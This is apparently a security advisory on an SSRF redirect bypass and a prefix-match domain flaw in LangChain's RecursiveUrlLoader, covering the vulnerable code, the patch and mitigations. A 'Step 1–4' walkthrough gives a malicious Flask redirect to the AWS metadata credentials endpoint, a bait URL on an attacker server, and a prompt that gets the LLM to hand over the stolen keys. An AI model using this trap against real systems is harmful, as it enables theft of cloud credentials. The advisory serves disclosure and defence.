Feb 25, 2026 · 5 min read
LangChain's URL loader checked if a URL was safe *before* fetching it, but let the `fetch` client automatically follow redirects to unsafe places. Attackers could use a 'safe' URL that redirects to `169.254.169.254` to steal cloud credentials.
A sophisticated Server-Side Request Forgery (SSRF) bypass was discovered in the `@langchain/community` package, specifically within the `RecursiveUrlLoader`. Despite previous attempts to secure this component against internal network scanning, the implementation failed to handle HTTP redirects manually. This allowed attackers to supply a benign, validated URL that subsequently redirected the server's HTTP client to sensitive internal resources (like AWS metadata services or local admin panels), completely bypassing the initial security checks. This vulnerability is a classic 'Check-Then-Act' (time-of-check/time-of-use) flaw in web security.
In the modern AI ecosystem, 'Agents' are the new hotness. Everyone wants an LLM that can browse the web, scrape documentation, and summarize the internet for them. To facilitate this, LangChain provides the `RecursiveUrlLoader` in its `@langchain/community` package. Its job is simple: take a URL, fetch the HTML, convert it to text, and feed it to the hungry AI.
From a security perspective, however, a tool that takes a user-supplied URL and makes a server-side HTTP request is, by definition, an SSRF (Server-Side Request Forgery) candidate. It is a proxy for the user. If you don't lock it down, that 'helpful' agent becomes a pivot point into your internal network.
LangChain knew this. They had protections in place (introduced in v1.1.14) to block requests to private IP ranges and internal metadata services. But as any seasoned breaker knows, security controls implemented at the application layer are often brittle. The developers made a classic mistake: they trusted the HTTP client to behave safely after the initial check. They were wrong.
The vulnerability stems from a fundamental misunderstanding of how the `fetch` API works in Node.js environments. The developers implemented a "Check-Then-Act" pattern: first, they validated the user-supplied URL against a blocklist (checking for private IPs like `192.168.x.x`); if the URL passed, they handed it off to `fetch()`.
Here is the catch: `fetch()` defaults to `redirect: 'follow'`. If the validated URL (e.g., `https://example.com`) returns a 301 or 302 status code pointing to `http://169.254.169.254/latest/meta-data/`, the fetch client blindly follows that instruction without re-validating the new destination. The initial security check is rendered useless because the URL that was checked is not the URL that was ultimately accessed.
But wait, there's more! The `RecursiveUrlLoader` also had a feature called `preventOutside` to keep the scraper within a specific domain. The implementation used a string-based `.startsWith()` check. This is a classic rookie error. If the allowed base is `https://company.com`, an attacker can bypass this check by registering `https://company.com.attacker.xyz`. Since the string technically "starts with" the target, the check passes, and the scraper happily leaks data to the attacker's domain.
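The bypass is easy to demonstrate. The function names below are illustrative, not LangChain's:

```javascript
// Illustrative comparison -- function names are not from LangChain.
const base = "https://company.com";

// The broken check: pure string prefix matching.
function sameSiteNaive(url) {
  return url.startsWith(base);
}

// The robust check: parse both URLs and compare origins
// (scheme + hostname + port), so lookalike domains fail.
function sameSiteStrict(url) {
  return new URL(url).origin === new URL(base).origin;
}

const evil = "https://company.com.attacker.xyz/exfil";
console.log(sameSiteNaive(evil));                        // true  -- bypassed!
console.log(sameSiteStrict(evil));                       // false
console.log(sameSiteStrict("https://company.com/docs")); // true
```

The origin comparison also rejects legitimate subdomains; if the scraper should be allowed to follow `docs.company.com`, compare against an explicit allowlist of origins rather than loosening the check back to string matching.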
Let's look at the logic failure. The vulnerability existed because the validation and the execution were decoupled by the fetch client's internal logic.
The Vulnerable Implementation (Simplified):

```javascript
// 1. Validate the initial URL
const isSafe = validateSafeUrl(initialUrl);
if (!isSafe) throw new Error("Unsafe URL");

// 2. Fetch it (default: follows redirects automatically)
// The fetch client receives a 302 -> internal IP, and follows it.
const response = await fetch(initialUrl);
return await response.text();
```

The Fix (v1.1.18):
The patch in commit 2812d2b2b9fd9343c4850e2ab906b8cf440975ee forces the application to handle redirects manually. It sets `redirect: 'manual'` and loops through the responses, validating every single hop.
```javascript
// The Hardened Approach (simplified; constants shown for completeness)
const REDIRECT_CODES = new Set([301, 302, 303, 307, 308]);
const MAX_REDIRECTS = 10;

for (let i = 0; i <= MAX_REDIRECTS; i++) {
  // Validate the URL for THIS specific hop
  validateSafeUrl(currentUrl, { allowHttp: true });
  const response = await this.caller.call(() =>
    fetch(currentUrl, {
      // ... options ...
      redirect: "manual", // STOP automatic following
      signal: AbortSignal.timeout(timeout),
    })
  );
  // If we get a redirect, extract the Location header and loop again
  if (REDIRECT_CODES.has(response.status)) {
    const location = response.headers.get("location");
    if (!location) throw new Error("Redirect without Location header");
    currentUrl = new URL(location, currentUrl).href;
    continue;
  }
  return response;
}
throw new Error("Too many redirects");
```

This code ensures that even if an attacker tries to sneak in a redirect, the application catches the new URL, inspects it against the blocklist, and denies access to the internal network.
Exploiting this requires a server you control and a target application running a vulnerable version of @langchain/community. The goal is to exfiltrate AWS credentials from the EC2 instance running the LLM.
Step 1: Setup the Trap
Host a simple HTTP server (Python http.server or Nginx) exposed to the internet. Configure a route that redirects visitors.
```python
# Malicious Flask App
from flask import Flask, redirect

app = Flask(__name__)

@app.route('/innocent-looking-page')
def trap():
    # Redirect to the AWS metadata service
    return redirect(
        "http://169.254.169.254/latest/meta-data/iam/security-credentials/",
        code=302,
    )
```

Step 2: Bait the Agent
Feed the URL `http://attacker-server.com/innocent-looking-page` to the LangChain application. The `validateSafeUrl` function checks the domain `attacker-server.com`. Since it resolves to a public IP and is not in a reserved range, it passes.
Step 3: Execution
LangChain fetches your URL. Your server responds with 302 Found to the AWS metadata IP. The fetch client follows it. The metadata service returns the IAM credentials (Access Key, Secret Key, Token). LangChain converts this JSON to text and returns it to the application (or feeds it into the LLM context).
Step 4: Profit
If the LLM is chat-based, you simply ask: "Summarize the document I just gave you." The LLM will kindly reply: "The document contains AWS credentials..." and hand over the keys to the kingdom.
The remediation is straightforward: upgrade `@langchain/community` to version 1.1.18 or later immediately. The broader lesson is more tedious: you cannot rely on high-level HTTP clients to handle redirects securely when SSRF is part of your threat model.
If you are a developer building similar systems, take note: always disable automatic redirects when fetching user-supplied URLs, and verify the destination of every hop. Additionally, never use string matching (`startsWith`, `includes`) for domain validation; always parse the URL with the `URL` API and compare the `origin` property.
Finally, application-layer security is your last line of defense, not your first. If your AI workers don't need access to the internal network, firewall them off. Block egress to 169.254.169.254 at the network level. If the code fails (and it will), the network policy should save you.
CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:N/A:N

| Product | Affected Versions | Fixed Version |
|---|---|---|
| @langchain/community (langchain-ai) | < 1.1.18 | 1.1.18 |
| Attribute | Detail |
|---|---|
| CWE ID | CWE-918 |
| Attack Vector | Network |
| CVSS | 4.1 (Medium) |
| Impact | Information Disclosure |
| Exploit Status | PoC Available |
| Patch Status | Released (v1.1.18) |
Server-Side Request Forgery (SSRF) occurs when a web application fetches a remote resource without validating the user-supplied URL. It allows an attacker to coerce the application into sending a crafted request to an unexpected destination, often bypassing firewalls.